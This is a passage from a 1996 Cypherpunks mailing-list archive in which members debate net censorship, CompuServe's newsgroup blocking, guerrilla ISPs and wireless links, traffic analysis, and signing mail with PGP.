Duncan Frissell wrote:

> > It used to be said that no country would be allowed to move from Communism
> > to Capitalism.  It can now be said that it is inconceivable that a modern
> > country will move from a Market to a Command Economy.  Market discipline is
> > strong.
> 
> Tell that to folks in the contries of used-to-be-Russia.  Lots of old 
> Communist leaders getting back into power - some folks are even saying 
> that the old days under the Communists were better than living in a free 
> market economy.
> 
> Never underestimate the value of human stupidity and shortsightedness.

In other words: If people dump communism for capitalism, it shows how
the free market will always triumph, and if people dump capitalism for
communism, it shows how stupid and shortsighted humans are.  Hmmmm...

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://www.wfmu.org/~davem




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 4 Jan 1996 13:32:59 +0800
To: ecarp@netcom.com
Subject: Re: Why Net Censorship Doesn't Work
Message-ID: <2.2.32.19960102201728.0069e780@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:29 AM 1/2/96 -0600, Ed Carp [khijol SysAdmin] wrote:

>Tell that to folks in the contries of used-to-be-Russia.  Lots of old 
>Communist leaders getting back into power - some folks are even saying 
>that the old days under the Communists were better than living in a free 
>market economy.

I said "modern" country.  Even so, Russia and the rest are much more market
dominated than they used to be.  Transition will not be easy but I doubt if
they'll go back.  As for an eternity of slavery being superior to too
rambunctious freedom -- we won't let them be that stupid.  The "cancer of
Anglo-Saxon values" is pretty powerful.

>> Where are the pressure points where regulation can be applied?
>
>How about on the backbone itself?  Since everyone goes through the htree 
>major backbones, all one would have to do is control access at those 
>points.  Of course, that would lead to clandestine use of 
>store-and-forward LEOsats, s&f UUCP sites, etc.  UUCP might even make a 
>comeback ;)

That would require outlawry of crypto over the backbone and some way of
convincing the backbone to run government approved code.  Quite a bit of
resistance would ensue.  Have the Feds ever successfully mandated that large
numbers of people run government code?

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 4 Jan 1996 02:58:25 +0800
To: dmandl@panix.com
Subject: Re: Why Net Censorship Doesn't Work
Message-ID: <2.2.32.19960102203505.006abc30@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:13 PM 1/2/96 -0500, dmandl@panix.com wrote:

>In other words: If people dump communism for capitalism, it shows how
>the free market will always triumph, and if people dump capitalism for
>communism, it shows how stupid and shortsighted humans are.  Hmmmm...
>
>   --Dave.
>

Remember the old Russian joke:

What's the difference between capitalism and socialism?

Capitalism is the exploitation of man by man and socialism is the exact reverse.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Blake <grafolog@netcom.com>
Date: Thu, 4 Jan 1996 03:02:46 +0800
To: Mark Hittinger <bugs@ritz.mordor.com>
Subject: Re: Netcom censoring alt.* ?
In-Reply-To: <199601021625.LAA04725@ritz.mordor.com>
Message-ID: <Pine.SUN.3.91.960102162628.23482G-100000@netcom8>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 2 Jan 1996, Mark Hittinger wrote:

> Now if there was only a way to tie the scientology thing in with the alt.*
> censorship conspiracy.

	There is.  

	Netcom is a repentant squirrel.  To ensure that
	Netocom will never ever deliver anything which offends
	Co$, Netcom has deleted all alt.* nesgroups.

        xan

        jonathon
        grafolog@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Thu, 4 Jan 1996 03:11:45 +0800
To: cypherpunks@toad.com
Subject: Re: Guerilla Internet Service Providers
Message-ID: <199601030032.QAA00749@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Jim Bell writes:

>It seems to me that phone line costs are turning into a floor price for
>Internet access, when they shouldn't really be.  The main asset telephone
>companies have, right now, is in RIGHTS OF WAY.  Put an ISP in a business
>park that allows you to run  your own dedicated copper pairs, and you've
>bypassed $25/month/line business phone line charges. 
>
>At some point, individual urban and suburban blocks could easily be
>"guerilla re-wired" for ISP access without serious trenching, etc.  The
>phoneco would still be involved, but in a far lower-profit mode, as the
>supplier of a single T1 to a multi-block area.  

That's assuming the phoneco cooperates.

Punknet is a 'Guerilla ISP'.  Twenty of us share a 128k ISDN line, 
distributed via high-speed modems.  It's been running fine for over
a year now, but Pacific Bell has evidently decided to get rid of us.

How?  Simply by refusing to either repair or replace our 25 pair trunk
line, which is rapidly degrading.  We've offered to replace it ourselves,
but according to them, it's illegal.  Right now, we've got three dead lines,
and two others that only will do 1200 baud.

We've been told that what they're doing is probably illegal, but it's the
old problem:  Where does an 800 lb. gorilla sleep?

We're fighting this like all hell, but who knows?  After they get rid of us,
I wonder who's next ...

- -- 
Jeff Simmons                           jsimmons@goblin.punk.net

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOnOnuL8IP70uJJBAQF3EwP9He5bWGBRcYv3LZDAB7XJt34zr+Pi/WWp
a2NjFdDuxxc7VwO1tcSvqq+PX23OtJnay9yWkcpRBUissyJ5CPzqGQv4dX8vqN0R
F1EK8zTSuEnQpiMVSqduknusVeQYOq2tP6b+iDtGKgCu2veDSLS10SY82qOPmQ8j
OjxkfDcxJjI=
=xJeV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael C. Peponis" <mianigand@unique.outlook.net>
Date: Thu, 4 Jan 1996 03:06:30 +0800
To: cypherpunks@toad.com
Subject: What to do about Germany
Message-ID: <199601030019.SAA23577@unique.outlook.net>
MIME-Version: 1.0
Content-Type: text/plain


What the German goverement threatned to do was inexcusable, but 
something can be done about it.

The way that mail and postings are handeld, it is possible to trash 
mail and posting coming or going to a certin destination.  This is 
censorship, but maybe the members of the goverment have justified 
such an action.

If they can censor others, should others not be able to censor them?  
That's one of the beauties of the electronic age, the only thing that 
matters is intelligence, numbers or political power have negligable 
effects.

Are the german authorities worthy of such an reaction? Have they 
crossed the line?

If they have, maybe they can serve as the example of what happens 
when a group of people attempt to force their will on others.
Regards,
Michael Peponis
PGP Key Avalible form MIT Key Server




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Grant, M.A. (Oxon)" <mark@unicorn.com>
Date: Thu, 4 Jan 1996 13:33:30 +0800
To: cypherpunks@toad.com
Subject: Re: Guerilla Internet Service Providers
Message-ID: <Pine.3.89.9601021822.A18697-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 2 Jan 1996, Jay Holovacs wrote:

> Commercial satallites have land based corporate owners. Remember the
> success that Alabama had a few years ago pulling the plug on a New York
> based softporn tv satellite distribution system. They simply went after the
> assets of the satellite companies and got quick cooperation.

About ten years ago a group I was involved with were thinking about
putting something into space as a publicity stunt. One company we talked
to claimed they could put 1 kg into orbit on one of their sounding rockets
for about $ 30,000 (that's a 1 kg satellite, not $ 30,000 per kg). How
small can you build a "data haven" satellite ? 

Looking a few years into the future, you could probably stick a
stripped-down Linux laptop with solar cells and a stripped-down satellite
telephone as a Net link on top of a slightly larger rocket and charge for
on-orbit storage using ecash... Using remailers it should be pretty-much
untraceable. 

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Thu, 4 Jan 1996 06:22:59 +0800
To: cypherpunks@toad.com
Subject: FCC require ISDN?
Message-ID: <2.2.32.19960103024025.00684b40@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:46 PM 01/2/96 -0600, Jim Choate bespake thusly:

>The FCC is enacting a new regulation that will cause every phone company to
>provide 100% of their service areas with ISDN (you should have received some
>kind of notice last week, I did). This also sets some minimum standards as
>well as to the type and quality of service the phone company must provide.

Citation? Here in Amarillo, if it rains, the phone lines start caving in,
and I'd like to beat up SWBT for ISDN service :-)

Dave Merriman

PS - sorry for posting this to the whole list, but couldn't get this past my
ISP to Jim directly :-(
-------------------------------------------------------------
"It is not the function of our Government to keep the citizen
from falling into error; it is the function of the citizen to
keep the Government from falling into error."
Robert H. Jackson (1892-1954), U.S. Judge
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@flame.alias.net (Anonymous)
Date: Thu, 4 Jan 1996 02:51:24 +0800
To: cypherpunks@toad.com
Subject: Risks of writing a remailer
Message-ID: <199601022345.AAA04572@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


  What are the legal risks of writing (and releasing) a remailer,
 and what steps can an author go to to minimise any unwanted (legal
 or civil) attention ?
  
 ob.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Fred Cohen)
Date: Thu, 4 Jan 1996 01:41:13 +0800
To: cypherpunks@toad.com
Subject: Re: Foiling Traffic Analysis
In-Reply-To: <199601030421.XAA29402@clark.net>
Message-ID: <9601031202.AA18524@all.net>
MIME-Version: 1.0
Content-Type: text


You seem to be missing an important point about foiling traffic
analysis.  It is essentially the same problem as the covert channel
problem and its solution has the same challenges - it consumes a great
in the way of resources.  In order to eliminate traffic analysis, you
essentially have to always use the full bandwidth available (although
you can have pseudo-random burst behaviors).  This in turn means that
instead of gaining the low cost resulting from sharing bandwidth, you
end up having far more utilization and (depending on what portion of the
world does this) increasing the price of the resource.  So it costs a
lot more and uses a great deal of bandwidth.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Thu, 4 Jan 1996 10:08:14 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Guerilla Internet Service Providers (fwd)
Message-ID: <v01530508ad104d103102@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


>As I understand the physics, the whole process could be made FAR FAR FAR
>more efficient if the rocket was boosted to about 40000 feet with a subsonic
>airplane, a' la' X-15 and such.  It's above 75% of the earth's atmosphere
>(dramatically reduced drag), is already going 600 mph in the correct
>direction, and is 8 miles closer to the  ultimate goal 250 miles up).  This
>might not sound like much of an advantage, but if you've ever worked out the
>mathematics of the Saturn V (or space shuttle, etc), the VAST majority of
>the fuel was used up in the first 20,000 feet, maybe even the first 5000
>feet.  It would be even better if the first stage could be an air-breathing
>supersonic ramjet, but that's not my field of expertise.

Orbital Sciences Corp in Virginia do exactly that, but with a B52 and a 60
foot long rocket. They launch relatively small payloads for relatively
cheap and have done it successfully on many occasions.


-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
                                   |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Thu, 4 Jan 1996 15:19:59 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: Guerilla Internet Service Providers (fwd)
In-Reply-To: <m0tXMnW-0008z2C@pacifier.com>
Message-ID: <199601031508.JAA05085@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> As a ham, too (N7IJS) I recognize your implicit selection of 2m or 450 MHz.
> But I gently object to this, for reasons that I think will be obvious.

I was thinking of the itenerant frequencies around 151 MHz, but the 
bandwidth would be limited.  I wasn't thinking of amateur frequencies, 
but my fingers sometimes have a mind of their own ;)

> First, technology has been marching on in the last 10-20 years, and
> communications frequencies of 2 GHz and more are technically do-able and
> comparatively empty.  (and with modern IC  technology, even easy)

I'd love to see plans (or used commercial gear) able to do this - I've 
got a point-to-point application that I'd love to set up ...

> Secondly,  ham gear tends to be used for long-range communication (miles and
> watts) and generally has little or no ability to frequency hop/time hop or
> to automatically turn down transmitter power to be able to share frequencies
> over short distances (low milliwatts or even microwatts).  Those high
> gigahertz frequencies would be ideal for communication over a few blocks
> distance.  (Sure, packet has been done for years but it is a still-born
> development;  they still think 9600 bps is a "fast" modem speed.)

The opportunities for this sort of thing are amazing.  And remember, 
there are two types of spread spectrum - the high bandwidth stuff as well 
as the frequency hopping stuff.

> I forsee  locally-owned boxes that are the equivalent of a wireless phone
> switch implementing re-used freuqency microcells; the cost SHOULD be far
> lower than the current copperline phone systems, once the telephones are
> paid for.  And they shouldn't cost much more than current 900 MHz cordless
> telephones, too.

Again, I'd like to see this, too...
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOqb1CS9AwzY9LDxAQGDQQP5AaMaKy6t4q6Xfog19JFAnuqxULH6r6UV
03I2sA+h1/vyM9fAuyUEwlBlKUrA3+tByM3VCn5Q2HH4twxwRRLRSn9peJG7fpnE
pc36wVwqwXHvKslrSFA10Y5lahEzuS7NC+jTYgw6l+VF17yJaPw+dtXlpcsq+SMo
bj3VDH6nVDQ=
=vamo
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 4 Jan 1996 01:40:52 +0800
To: Steve Gibbons <steve@aztech.net>
Subject: Re: Guerilla Internet Service Providers (fwd)
Message-ID: <m0tXWnU-00090EC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:08 AM 1/3/96 -700, you wrote:

>All of this is assuming that the bandwidth is available on the airwaves to
>handle ~200 ~T1s.  (If we're talking $200.00/mo. for T1, sign me up tomorrow,
>and my neighbor, and his, and hers, and...  *poof* no more bandwidth in a
>"decently" populated metro area or even a downtown.  (Back of the envelope
>calculations show that ~200 T1 ~= 1 TV station [although I might be off by an
>order of magnitude.])
>
>I apologize if this is off topic, but the crypto part still applies (moreso,
>even!) to broadcast over the airwaves.  (Besides, I'm sure that this list has
>enough subscribers that are shelling out $200-$500/mo. for 56K/Frac T1/ISDN
>that they'd be interested in a less expensive alternative.)
>Steve@AZTech.Net


To a certain extent, I think this is (or should be!) VERY MUCH "on topic."
If our goal is to allow/assist privacy, we need to start actually
anticipating technological developments so that we can do "minor course
corrections" that will end up guaranteeing unbreakable security.  One of
these is by routing data through organizations (NOT THE PHONE CO!) that
won't tend to kow-tow to the wishes of the government.  We know that if this
telephone-company bypass is done, it can either be done "right" (from a
cypherpunks standpoint; so that it's including encryption, etc) or "wrong."
If we don't plan ahead, it will almost certainly be done "wrong."   Witness
the fact that the vast majority of modems contain no encryption standard,
for example.  If USR or somebody else had mandated it in 1982 with 2400 bps
modems, we might all be talking on encrypted lines already.

And as you pointed out, this is especially important if RF is the
medium-of-choice for connections.  We should definitely make a serious
amount of contact with people working on the PCS standards to ensure that
GOOD encryption is included.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 4 Jan 1996 02:17:37 +0800
To: ecarp@netcom.com
Subject: Re: Guerilla Internet Service Providers (fwd)
Message-ID: <m0tXXEW-00091KC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:08 AM 1/3/96 -0600, you wrote:
>
>> As a ham, too (N7IJS) I recognize your implicit selection of 2m or 450 MHz.
>> But I gently object to this, for reasons that I think will be obvious.
>
>I was thinking of the itenerant frequencies around 151 MHz, but the 
>bandwidth would be limited.  I wasn't thinking of amateur frequencies, 
>but my fingers sometimes have a mind of their own ;)

Interestingly enough, my primary objection was NOT really commercial
encroachment on an existing amateur structure (though that is an important
consideration!); rather, it was the fact that because we're talking really
short-range communication (way less than a kilometer, in most cases) using
frequencies below a gigahertz would be a counter-productive shame.  Here, we
WANT "line of sight"!  And, of course, the bandwidth issue is inherently
better:  It would be FAR easier to get 100 MHz width at around 2.5 GHz than
under 1 gig!

>> First, technology has been marching on in the last 10-20 years, and
>> communications frequencies of 2 GHz and more are technically do-able and
>> comparatively empty.  (and with modern IC  technology, even easy)
>
>I'd love to see plans (or used commercial gear) able to do this - I've 
>got a point-to-point application that I'd love to set up ...

I get a free (bingo-card) magazine industry magazine called "Microwaves and
RF," which is sort of the EDN for the high-frequency communication crowd.
You'd be amazed at the level of technical (chip) development there.  Chip
sets that do frequency synthesis/full RF/IF on surface mount chips.    

Jim Bell, N7IJS

 
(BTW, I use Eudora, and I have PGP.  Could somebody explain how to PGP-sign
messages, ideally EASILY?)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Thu, 4 Jan 1996 10:52:21 +0800
To: cypherpunks@toad.com
Subject: AP Story: "Germans: Was CompuServe's Call
Message-ID: <199601031516.KAA13633@pipe5.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


CPers may want to examine this Associated Press story: 
 
"Germans: Was CompuServe's Call" 02 Jan 1996, 14:30 
clari.news.censorship 
Message-ID: <Agerman-compuserveURyaQ_6J2@clari.net> 
-- 
     -- tallpaul 
     -- Visualize HappyNet! 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 4 Jan 1996 02:40:51 +0800
To: cypherpunks@toad.com
Subject: Re: Guerilla Internet Service Providers (fwd)
Message-ID: <199601031815.KAA15424@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 23:33 1/2/96 -0800, Lucky Green wrote:

Previous exchanges deleted...

>Infrared and laser are not very reliable between buildings during fog.
>Between your house and your neighbor, a low cost 900MHz bridge would be the
>best way to go. On such short distances, an omni-directional antenna will
>work just fine. Check out Solectek (cheaper) or Cylink (faster). Both offer
>DES link encryption.

With a tightly focused beam (light is easy, I don't know about lower
frequencies), you can prevent interception except by very obvious physical
devices.  (e.g. Someone in a cherry picker truck.)  You may be able to
avoid the need to encrypt the link (and all the paranoia about key
management, advances in factoring etc. that that implies.)

Bill

-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Thu, 4 Jan 1996 00:12:07 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: Guerilla Internet Service Providers [NOISE]
In-Reply-To: <m0tXNaA-0008zSC@pacifier.com>
Message-ID: <96Jan3.102233edt.2052@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


> As I understand the physics, the whole process could be made FAR FAR FAR
> more efficient if the rocket was boosted to about 40000 feet with a subsonic
> airplane, a' la' X-15 and such.  It's above 75% of the earth's atmosphere
> (dramatically reduced drag), is already going 600 mph in the correct
> direction, and is 8 miles closer to the  ultimate goal 250 miles up).  This
> might not sound like much of an advantage, but if you've ever worked out the
> mathematics of the Saturn V (or space shuttle, etc), the VAST majority of
> the fuel was used up in the first 20,000 feet, maybe even the first 5000
> feet.  It would be even better if the first stage could be an air-breathing
> supersonic ramjet, but that's not my field of expertise.

Cypherpunks isn't the right place to discuss this in detail, but...

Efficiency != Cheap
Kerosene is cheap.  Steel fuel tanks and rocket motors are quite cheap.
Making big dumb rockets is well understood.  However, aircraft integration
is not.  If you use an 'off-the-shelf' aircraft, it has a human in it.
That means the whole thing must be safe.  If you don't, you have a drone
aircraft which isn't cheap at all.  Remember, the cost of materials
scales linearly with size.  The cost of a complex system scales as the
square of the parts count.

These arguments are hashed out (admittedly without consensus) regularly
in the sci.space newsgroups.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 4 Jan 1996 02:41:11 +0800
To: cypherpunks@toad.com
Subject: Windows Eudora and PGP
Message-ID: <2.2.32.19960103182405.00946468@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:43 AM 1/3/96 -0800, Jim Bell wrote:

>(BTW, I use Eudora, and I have PGP.  Could somebody explain how to PGP-sign
>messages, ideally EASILY?)

I use Eudora as well.  It is not as easy as I would like.  You have a couple
of options:

1)  Use cut-and-paste into Private Idaho.  Private Idaho will allow you to
paste back into Eudora.  (Or you can send out from Private Idaho directly.)
This option is useful becuase it supports nyms and chaining of remailers.

2)  Get one of the standard Windows PGP shells and paste into that.  After
signing, you will have to repaste into Eudora again.

These seem to be the only options.  I am not certain if there is a standard
DDE or OLE interface that could be used to feed message information back and
forth between Eudora and some other app.  There have been a number of
promises of Eudora/PGP integration, but nothing has materialized yet.

There are no easy answers I know of...

If you need a copy of Private Idaho, I can point you to a web site or bring
a copy along to the meeting on the 20th.
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
"Governments are potholes on the Information Superhighway." - Not TCMay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rubin@faline.bellcore.com (Aviel D Rubin)
Date: Thu, 4 Jan 1996 10:52:43 +0800
To: cypherpunks@toad.com
Subject: Experience teaching cryptography and computer security at NYU
Message-ID: <199601031528.KAA04490@faline.bellcore.com>
MIME-Version: 1.0
Content-Type: text/plain


Last semester, I taught a graduate course called "Cryptography and
Computer Security" at NYU. I have written up a summary of the 
experience. You can find it at

ftp:    thumper.bellcore.com  in /pub/rubin/fall95.ps or fall95.ps.Z
web:    ftp://thumper.bellcore.com/pub/rubin/fall95.ps.Z

and there is a link to it from my home page:
        ftp://thumper.bellcore.com/pub/rubin/rubin.html

I will be teaching the same class next semester at NYU, and there are
plans for a sequel next fall.

Avi
  

*********************************************************************
Aviel D. Rubin                       Email: rubin@faline.bellcore.com
Research Scientist                           Adjunct Professor at NYU
Bellcore (MRE-2M354)  
445 South St.         ftp://thumper.bellcore.com/pub/rubin/rubin.html
Morristown,  NJ  07960                         Voice: +1 201 829 4105
USA                                            FAX:   +1 201 829 2645




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Thu, 4 Jan 1996 09:12:17 +0800
To: cman@communities.com (Douglas Barnes)
Subject: Re: Why Net Censorship Doesn't Work
In-Reply-To: <v02120d03ad0f6483762e@[199.2.22.120]>
Message-ID: <9601031537.AA16841@outland>
MIME-Version: 1.0
Content-Type: text/plain



> One of my co-workers has pointed out that the need for something as
> simple as a helper application for Netscape loses about 90% of his
> audience. By simply making it rather more difficult for people to
> chat about some things, governments can effectively push such things
> out of the way of all but the most determined readers.

	Ah, but consider what happens when Java (or Java-esque platform
independant executable content) really takes off.  

	Gee, your browser doesn't know how to view image/stego?
Just pull down https://foobaz.com/isView.class and off you go.  (Or your
browser will pull it down automagically for you and pay the author for 
it from your ewallet.  Or it could rent a copy from Blockbuster(tm)
Applets.  You get the idea :) Software will become less and less what your 
machine has and more what it has access to.

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Thu, 4 Jan 1996 03:15:52 +0800
To: frissell@panix.com
Subject: Re: Compuserve *hasn't* banned newsgroups
In-Reply-To: <Pine.3.89.9601031005.D23167-0100000@offshore.com.ai>
Message-ID: <Pine.LNX.3.91.960103102754.23199A-100000@offshore.com.ai>
MIME-Version: 1.0
Content-Type: text/plain



It seems to me that posting this widely on Compuserve (or at least on
alt.online-service.compuserve) and then contacting CNN and making comments
about how "the Internet interprets censorship as damage and routes around
it" is the best way to handle this.  We want the public to get the idea
that censorship does not work on the Internet. 

Are you up for this Duncan?  Or do you want to call for volunteer, or
should this get posted anonymously.  :-) Seems better if someone does it
who is willing to talk to reporters, and who is a Compuserve user.  Makes
a better story on TV etc. 

   --  Vince

Duncan:
> I grabbed a copy of the Free Agent newsreader:
> 
> http://www2.interpath.net/forte/agent/freagent.htm
> [...]
> I grabbed the latest list of open NNTP Servers from:
> 
> http://dana.ucc.nau.edu/~jwa/open-sites.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 4 Jan 1996 05:17:56 +0800
To: cypherpunks@toad.com
Subject: Re: Foiling Traffic Analysis
Message-ID: <v02120d08ad107b4e9236@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:02 1/3/96, Fred Cohen wrote:
>You seem to be missing an important point about foiling traffic
>analysis.  It is essentially the same problem as the covert channel
>problem and its solution has the same challenges - it consumes a great
>in the way of resources.  In order to eliminate traffic analysis, you
>essentially have to always use the full bandwidth available (although
>you can have pseudo-random burst behaviors).  This in turn means that
>instead of gaining the low cost resulting from sharing bandwidth, you
>end up having far more utilization and (depending on what portion of the
>world does this) increasing the price of the resource.  So it costs a
>lot more and uses a great deal of bandwidth.

You are correct. A network of encrypted links that allways move packets at
full bandwidth is the basis of Wei Dai's Pipenet. If anyone ever codes
this, I am willing to sponsor a node. Other nodes may be set up if some
payment mechanism using Ecash is integrated with the system.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 4 Jan 1996 03:11:21 +0800
To: jim bell <ecarp@netcom.com
Subject: Re: Guerilla Internet Service Providers (fwd)
Message-ID: <v02120d09ad107d570ca3@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:43 1/3/96, jim bell wrote:

>Interestingly enough, my primary objection was NOT really commercial
>encroachment on an existing amateur structure (though that is an important
>consideration!); rather, it was the fact that because we're talking really
>short-range communication (way less than a kilometer, in most cases) using
>frequencies below a gigahertz would be a counter-productive shame.  Here, we
>WANT "line of sight"!  And, of course, the bandwidth issue is inherently
>better:  It would be FAR easier to get 100 MHz width at around 2.5 GHz than
>under 1 gig!

There are several vendors offering 2.4GHz wireless with ranges up to 20
miles. Though the 900MHz stuff is much cheaper. Unless you have a pager
cell on your roof, 900MHz should serve you fine.

>I get a free (bingo-card) magazine industry magazine called "Microwaves and
>RF," which is sort of the EDN for the high-frequency communication crowd.
>You'd be amazed at the level of technical (chip) development there.  Chip
>sets that do frequency synthesis/full RF/IF on surface mount chips.

If you don't want to build your own, there are various vendors that use the
NEC 900MHz bridge card in their products. Or just buy the card, get an old
486, and round up the software from somone.

>(BTW, I use Eudora, and I have PGP.  Could somebody explain how to PGP-sign
>messages, ideally EASILY?)

Assuming Eudora for Mac: Download MacPGP Control.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 4 Jan 1996 00:33:53 +0800
To: cypherpunks@toad.com
Subject: FOI_led
Message-ID: <199601031602.LAA06860@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   For comparison to snooping on search site searchers.
   
   1-3-96. WsJo:

   "Freedom of Information Act Gets Wider Use by Sleuths,
   Snoops and Senators."

      FOIA is a handy tool for companies, politicians and 
      journalists to snoop on one another. Many people who 
      file requests aren't aware that the requests themselves 
      are made public. Those who really know the process 
      make FOIA requests on other people's FOIA requests. 
      "It's not like I tapped someone's phone or got them 
      drunk. These are public documents."

      Journalists sometimes use FOIA to scoop their
      colleagues. A cottage industry provides information 
      about other people seeking information. Lexis/Nexis 
      carries synopses of FOIA requests. 

      So rich is FOIA intelligence that some are learning to
      take countermeasures. For a $36 fee, FOI Services will
      file its own FOIA requests on behalf of people who wish
      to remain anonymous.

   FOI_led













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@eternity.c2.org
Date: Thu, 4 Jan 1996 08:37:21 +0800
To: frissell@panix.com (Duncan Frissell)
Subject: Re: Compuserve *hasn't* banned newsgroups
In-Reply-To: <2.2.32.19960103180226.006a9ffc@panix.com>
Message-ID: <199601031928.LAA18583@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> CIS refugees will be forced to pay Sameer the massive $12.50 (?) a month for
	$7.50

-- 
sameer						Voice:   510-601-9777x3
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@cris.com>
Date: Thu, 4 Jan 1996 02:02:49 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: Chinese Cypherpunk quote  [NOISE]
In-Reply-To: <ZuJXgD22w165w@bwalk.dm.com>
Message-ID: <557mz96uc7.fsf@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


dlv@bwalk.dm.com (Dr. Dimitri Vulis) said:

DV> Corey Bridges <corey@netscape.com> writes:
>> To reply simply: Wrong -- the will of the people is as fickle as the
>> wind.  Follow the will of the people, and you run your country by
>> following fads.  Mob rule and all that. We're in deep trouble if we
